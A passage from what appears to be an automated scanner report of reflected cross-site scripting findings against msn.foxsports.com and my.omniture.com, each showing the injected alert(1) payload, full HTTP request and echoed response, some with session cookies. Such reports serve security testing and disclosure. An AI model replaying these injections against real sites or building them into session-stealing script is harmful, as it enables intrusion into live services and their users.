The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f35a8'-alert(1)-'4bf9c40ab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nba/story/Mavericks-102-Wizards-92-01372633?f35a8'-alert(1)-'4bf9c40ab7=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 250652
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=11
Date: Wed, 02 Feb 2011 15:37:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nba/story/Mavericks-102-Wizards-92-01372633?f35a8'-alert(1)-'4bf9c40ab7=1';

       startComments('StoryComments', '26551003'); // load up team comments
   </script>
...[SNIP]...

1.149. http://msn.foxsports.com/nba/story/Miami-Heat-LeBron-James-hand-Cleveland-Cavaliers-21st-straight-loss-013111 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nba/story/Miami-Heat-LeBron-James-hand-Cleveland-Cavaliers-21st-straight-loss-013111

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42b34'-alert(1)-'dc8cb17c584 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nba/story/Miami-Heat-LeBron-James-hand-Cleveland-Cavaliers-21st-straight-loss-013111?42b34'-alert(1)-'dc8cb17c584=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 261871
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=7
Date: Wed, 02 Feb 2011 15:37:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nba/story/Miami-Heat-LeBron-James-hand-Cleveland-Cavaliers-21st-straight-loss-013111?42b34'-alert(1)-'dc8cb17c584=1';

       startComments('StoryComments', '26528138'); // load up team comments
   </script>
...[SNIP]...

1.150. http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Goats [GT1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl/lists/Top_10_Super_Bowl_Goats

Issue detail

The value of the GT1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 104a6'-alert(1)-'eed66588032 was submitted in the GT1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nfl/lists/Top_10_Super_Bowl_Goats?GT1=39002104a6'-alert(1)-'eed66588032 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 227087
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=48
Date: Wed, 02 Feb 2011 15:37:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Goats?GT1=39002104a6'-alert(1)-'eed66588032';

       startComments('StoryComments', '5'); // load up team comments
   </script>
...[SNIP]...

1.151. http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Goats [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl/lists/Top_10_Super_Bowl_Goats

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3309'-alert(1)-'0aa3faa4c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nfl/lists/Top_10_Super_Bowl_Goats?a3309'-alert(1)-'0aa3faa4c6a=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 226893
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=17
Date: Tue, 01 Feb 2011 15:36:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Goats?a3309'-alert(1)-'0aa3faa4c6a=1';

       startComments('StoryComments', '5'); // load up team comments
   </script>
...[SNIP]...

1.152. http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Heroes [GT1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl/lists/Top_10_Super_Bowl_Heroes

Issue detail

The value of the GT1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14557'-alert(1)-'f363dc20028 was submitted in the GT1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nfl/lists/Top_10_Super_Bowl_Heroes?GT1=3900214557'-alert(1)-'f363dc20028 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 226622
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=45
Date: Wed, 02 Feb 2011 15:37:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Heroes?GT1=3900214557'-alert(1)-'f363dc20028';

       startComments('StoryComments', '5'); // load up team comments
   </script>
...[SNIP]...

1.153. http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Heroes [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl/lists/Top_10_Super_Bowl_Heroes

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb7fd'-alert(1)-'350d2cec32c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nfl/lists/Top_10_Super_Bowl_Heroes?bb7fd'-alert(1)-'350d2cec32c=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 226451
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=17
Date: Tue, 01 Feb 2011 15:36:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Heroes?bb7fd'-alert(1)-'350d2cec32c=1';

       startComments('StoryComments', '5'); // load up team comments
   </script>
...[SNIP]...

1.154. http://msn.foxsports.com/nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111 [gt1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111

Issue detail

The value of the gt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload feba4'-alert(1)-'a1c1bd68b1d was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111?gt1=39002feba4'-alert(1)-'a1c1bd68b1d HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 252008
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Date: Wed, 02 Feb 2011 15:37:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
ssportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111?gt1=39002feba4'-alert(1)-'a1c1bd68b1d';

       startComments('StoryComments', '26544030'); // load up team comments
   </script>
...[SNIP]...

1.155. http://msn.foxsports.com/nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b9d2'-alert(1)-'f94768913cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111?7b9d2'-alert(1)-'f94768913cf=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 248480
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=21
Date: Tue, 01 Feb 2011 15:36:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111?7b9d2'-alert(1)-'f94768913cf=1';

       startComments('StoryComments', '26544030'); // load up team comments
   </script>
...[SNIP]...

1.156. http://msn.foxsports.com/nfl/story/Police-watch-for-sex-trafficking-ahead-of-big-game-58165206 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl/story/Police-watch-for-sex-trafficking-ahead-of-big-game-58165206

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a43a0'-alert(1)-'a64d4955fc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nfl/story/Police-watch-for-sex-trafficking-ahead-of-big-game-58165206?a43a0'-alert(1)-'a64d4955fc7=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 253613
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=7
Date: Wed, 02 Feb 2011 15:37:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/story/Police-watch-for-sex-trafficking-ahead-of-big-game-58165206?a43a0'-alert(1)-'a64d4955fc7=1';

       startComments('StoryComments', '26569115'); // load up team comments
   </script>
...[SNIP]...

1.157. http://msn.foxsports.com/nfl/story/Troy-Polamalu-beats-Clay-Matthews-for-top-defensive-player-award-013111 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl/story/Troy-Polamalu-beats-Clay-Matthews-for-top-defensive-player-award-013111

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85ab0'-alert(1)-'e3786f32ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nfl/story/Troy-Polamalu-beats-Clay-Matthews-for-top-defensive-player-award-013111?85ab0'-alert(1)-'e3786f32ad=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 258371
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=7
Date: Wed, 02 Feb 2011 15:37:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/story/Troy-Polamalu-beats-Clay-Matthews-for-top-defensive-player-award-013111?85ab0'-alert(1)-'e3786f32ad=1';

       startComments('StoryComments', '26541133'); // load up team comments
   </script>
...[SNIP]...

1.158. http://msn.foxsports.com/nfl/story/pittsburgh-steelers-know-way-around-super-bowl-xlv-media-circus-013111 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl/story/pittsburgh-steelers-know-way-around-super-bowl-xlv-media-circus-013111

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4410'-alert(1)-'23ffae24f86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nfl/story/pittsburgh-steelers-know-way-around-super-bowl-xlv-media-circus-013111?d4410'-alert(1)-'23ffae24f86=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 258524
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=6
Date: Wed, 02 Feb 2011 15:37:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/story/pittsburgh-steelers-know-way-around-super-bowl-xlv-media-circus-013111?d4410'-alert(1)-'23ffae24f86=1';

       startComments('StoryComments', '26554000'); // load up team comments
   </script>
...[SNIP]...

1.159. https://my.omniture.com/login/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://my.omniture.com
Path:   /login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38a79"-alert(1)-"7f4bdae527e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login/?38a79"-alert(1)-"7f4bdae527e=1 HTTP/1.1
Host: my.omniture.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; sc_locale=en_US; sc_locale_numbers=en_US

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:18:12 GMT
Server: Omniture AWS/2.0.0
xserver: www441
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 52249

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<!--[if IE 9]
...[SNIP]...
jpj":"35919627386597","dashboard_id":"","history_id":"35919627386597","excel":"","came_from":"%2Flogin%2Findex.html%3F38a79%255C%2522-alert%25281%2529-%255C%25227f4bdae527e%3D1","REQUEST_URI":"/login/?38a79"-alert(1)-"7f4bdae527e=1","OBERON_START_DATE":null,"jpj_old":""};
Omniture.Config.reportname = 'Adobe Online Marketing Suite';
Omniture.Config.page_id = '100000';
Omniture.Config.recent_date_range_js = null;
Omniture.Config
...[SNIP]...

1.160. https://my.omniture.com/p/suite/1.2/index.html [jpj parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://my.omniture.com
Path:   /p/suite/1.2/index.html

Issue detail

The value of the jpj request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2a15"-alert(1)-"9e4c75fec7b was submitted in the jpj parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67&jpj=95253754444132c2a15"-alert(1)-"9e4c75fec7b HTTP/1.1
Host: my.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:32:17 GMT
Server: Omniture AWS/2.0.0
Vary: Accept-Encoding,User-Agent
xserver: www645
Content-Type: text/html
Connection: close
Content-Length: 27728

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<!--[if I
...[SNIP]...
62343468","excel":"","came_from":"%2Fp%2Fsuite%2F1.2%2Findex.html%3Fa%3DMain.SSOHelp","REQUEST_URI":"/p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67&jpj=95253754444132c2a15"-alert(1)-"9e4c75fec7b","OBERON_START_DATE":null,"jpj_old":"95253754444132c2a15"-alert(1)-"9e4c75fec7b"};
Omniture.Config.reportname = '';
Omniture.Config.page_id = '100000';
Omniture.Config.recent_date_range_js = null;
Omn
...[SNIP]...

1.161. https://my.omniture.com/p/suite/1.2/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://my.omniture.com
Path:   /p/suite/1.2/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebfe1"-alert(1)-"79f9f86c119 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67&jpj=95253754444132&ebfe1"-alert(1)-"79f9f86c119=1 HTTP/1.1
Host: my.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:33:35 GMT
Server: Omniture AWS/2.0.0
Vary: Accept-Encoding,User-Agent
xserver: www453
Content-Type: text/html
Connection: close
Content-Length: 27828

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<!--[if I
...[SNIP]...
